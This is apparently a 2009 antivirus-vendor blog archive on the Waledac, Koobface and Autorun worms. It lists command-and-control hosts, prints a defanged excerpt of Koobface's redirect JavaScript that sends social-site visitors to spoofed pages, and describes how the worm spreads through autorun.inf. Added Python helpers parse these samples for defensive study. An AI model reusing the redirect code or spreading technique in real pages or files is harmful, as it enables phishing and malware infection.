Archive for the ‘Worm’ Category
Monday, August 24th, 2009
We may be seeing the stirrings of yet another Waledac distribution. Servers at 95.211.8.215 and 95.211.8.161 have been serving up a number of unusually named files since the 20th that appear to carry not only the common Waledac unpacking stub, but also some of the classic characteristics of the Waledac trojan/worm — the email/spam engine, the AES-encrypted/bzip2-compressed P2P peer listing, DDoS capabilities, HTTP C&C contact, an email harvester, and credential-stealing functionality. Along with the FakeAv downloads coming from these servers, these executables may be a variant of the spambot. We’ll update this post with more information as we more accurately identify the malware.
Update: Some of the files definitely are Waledac spam/dos bots, with encoded command and control communications retrieved from http://cismosis. com/up21.php (there are others), as evidenced here:

AV detection is surprisingly low for these executables; be sure to add a layer of behavioral protection to your system with ThreatFire.
Posted in Undetected malware, Waledac, Worm | No Comments »
Friday, August 7th, 2009
koob-Face or ter-Twit? The ongoing abuse of Twitter feeds by malware distributors continues to net more social networking victims. As always, be wary of any executable you are prompted to download and execute. Currently, evil tweets for “My home video” or “cool video! WOW!” redirect to a set of spoofed social network pages. The malicious pages present visiting users with a prompt for a plugin install, “Flash player upgrade required”. An example here:

The malicious Koobface worm that ThreatFire has been preventing on desktops is served up from this site under the name “setup.exe”. Interestingly, a number of the IP addresses serving up Koobface have also been in use by Waledac distributors.
The ThreatFire community has been reporting the Koobface nastiness being served from multiple web servers today, with fairly heavy Koobface volume from web servers hosted on six IP addresses.
Update: Thankfully, as the malware distributors have changed some of their tweet tactics, their web server at kukuruku-290709. com has been pulled out from under them. Here is an example portion of the JavaScript (mods mine) hosted on the redirect pages; it examines the victim’s search URL and, based on a list of extremely popular social networking sites, redirects them to one of a variety of spoofed pages:
// KROTEG
var abc1 = 'hxxp://kukuruku-290709. com/go/';
var abc2 = 'hxxp://kukuruku-290709. com/go/';
var ss = '' + location.search;   // query string of the page the victim arrived on
// choose the landing-page prefix depending on whether a query string is present
if ((location.search).length>0) abc = abc1; else abc = abc2;
// [bait site, spoofed page] pairs: the bait site is matched against the URL
// and the visitor is sent to the corresponding fake login/plugin page
var redirects = [
['facebook. com', abc+'fb.php'],
['tagged. com', abc+'tg.php'],
['friendster. com',abc+'fr.php'],
['myspace. com', abc+'ms.php'],
['msplinks. com', abc+'ms.php'],
['myyearbook. com',abc+'yb.php'],
['fubar. com', abc+'fu.php'],
['twitter. com', abc+'tw.php'],
['hi5. com', abc+'hi5.php'],
['bebo. com', abc+'be.php']];
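As an added example (not code from the original post), the Python helper below statically pulls the bait-site/landing-page table out of a redirect script like the one above and reproduces the abc1/abc2 prefix choice for a given query string, without ever executing the script; the sample script text is constructed from the defanged snippet, and the function names are my own.

```python
import re
from typing import Dict, List

# Constructed sample: the redirect table from the post, keeping the blog
# author's defanged spellings ('hxxp', 'site. com') so nothing here is a live link.
SAMPLE_JS = r"""
var abc1 = 'hxxp://kukuruku-290709. com/go/';
var abc2 = 'hxxp://kukuruku-290709. com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook. com', abc+'fb.php'],
['tagged. com', abc+'tg.php'],
['twitter. com', abc+'tw.php'],
['bebo. com', abc+'be.php']];
"""

STRING_VAR_RE = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'")
# [ 'bait site', prefixVar + 'page.php' ]
PAIR_RE = re.compile(r"\[\s*'([^']+)'\s*,\s*(\w+)\s*\+\s*'([^']+)'\s*\]")
# if ((location.search).length>0) X = A; else X = B;
SELECT_RE = re.compile(r"length\s*>\s*0\)\s*(\w+)\s*=\s*(\w+)\s*;\s*else\s*\1\s*=\s*(\w+)")


def extract_redirects(js: str, search: str = "") -> Dict[str, str]:
    """Recover bait site -> spoofed landing page by reading the script, never running it.

    `search` stands in for location.search so the abc1/abc2 choice is reproduced
    statically; an unknown prefix variable is reported as '?' rather than guessed."""
    consts = dict(STRING_VAR_RE.findall(js))
    sel = SELECT_RE.search(js)
    if sel:
        chosen, if_nonempty, if_empty = sel.groups()
        consts[chosen] = consts.get(if_nonempty if search else if_empty, "?")
    return {site: consts.get(prefix_var, "?") + page
            for site, prefix_var, page in PAIR_RE.findall(js)}


def landing_hosts(table: Dict[str, str]) -> List[str]:
    """Distinct hosts the table sends victims to: the blocklist candidates for an analyst."""
    hosts = set()
    for target in table.values():
        m = re.match(r"\w+://([^/]+)/", target)
        if m:
            hosts.add(m.group(1))
    return sorted(hosts)
```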
Again, if you are a user of these sites and receive a tweet from someone you don’t know that redirects you to a page that serves up an executable download, be very suspicious. And of course, run a behavior-based solution like ThreatFire as a layer on your system.
Posted in Bot, Koobface, Social Engineering, Trojan, Worm | 1 Comment »
Tuesday, June 2nd, 2009
A new variant of an Autorun worm is on the loose, probably created by another childish and angry ex-lover. The little multithreaded beast injects into Windows Explorer and attempts to communicate with one of several IRC servers at June.IRCdevils.net, June.helldark.biz, and June.a7aneek.net, using a “VirUS/Virus” user/pass and a “VirUS-randstring” nick.
We noticed it this morning on multiple machines, and it seems to be spreading. The worm injects itself into the Windows Explorer shell, and from there attempts to update multiple locations in the registry and to write itself to removable drives like USB sticks as SETUP\DATA\June.exe. It includes a nasty message in the accompanying autorun.inf file, a long annoying string: ;HEHhahahahehhehehahahahhehehehaha
It was packed with Armadillo, which potentially made it difficult for the AV vendors to detect — none detected it this morning, and this afternoon seems to bring only one or two vendors declaring it “suspicious” since we uploaded it to VirusTotal for sharing. Be sure to add true client-side behavioral protection to your system, and as always, use caution when sharing USB sticks with others.
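As an added example (not from the original post), a Python check that parses an autorun.inf of the kind described and reports the executable it would launch along with the long junk comment; the sample file contents and the function names are constructed for illustration, modelled on the SETUP\DATA\June.exe path and comment string from the post.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the shape the post describes: an autorun.inf on a USB
# stick that points at the dropped worm and carries its taunting comment line.
SAMPLE_AUTORUN_INF = """
;HEHhahahahehhehehahahahhehehehaha
[autorun]
open=SETUP\\DATA\\June.exe
shellexecute=SETUP\\DATA\\June.exe
action=Open folder to view files
"""

# Keys through which autorun.inf gets code run, and keys used only to dress up the prompt.
EXEC_KEYS = {"open", "shellexecute", "shell\\open\\command", "shell\\explore\\command"}
LURE_KEYS = {"action", "icon", "label"}
EXECUTABLE_RE = re.compile(r"\.(exe|com|scr|bat|cmd|pif|vbs)\b", re.I)


def parse_autorun(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Return ([autorun] entries with lower-cased keys, list of ';' comment lines)."""
    entries: Dict[str, str] = {}
    comments: List[str] = []
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";"):
            comments.append(line[1:])
        elif line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries, comments


def autorun_findings(text: str) -> List[str]:
    """Human-readable findings for an autorun.inf; an empty list means nothing stood out."""
    entries, comments = parse_autorun(text)
    findings = []
    for key in sorted(EXEC_KEYS & entries.keys()):
        if EXECUTABLE_RE.search(entries[key]):
            findings.append(f"{key} launches executable {entries[key]}")
    lures = sorted(LURE_KEYS & entries.keys())
    if findings and lures:  # a launch entry plus a friendly label is the classic disguise
        findings.append("lure keys present: " + ", ".join(lures))
    for c in comments:
        if len(c) > 20 and not re.search(r"\s", c):  # long unbroken junk string
            findings.append("junk comment: " + c[:30])
    return findings
```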
We are seeing it running on systems alongside FakeAv installers, including “System Security”, where we see the fake scare tactics blaring “WARNING! 38 infections found!!!”. The two may be related; we are investigating.

The rogue, of course, continues to nag the user with “System Security Firewall has blocked a program from accessing the internet” and pops its nag system tray balloon with “System Security Warning Your PC is still infected with dangerous viruses”.

Posted in Autorun, FakeAlert, Rogueware, Worm | No Comments »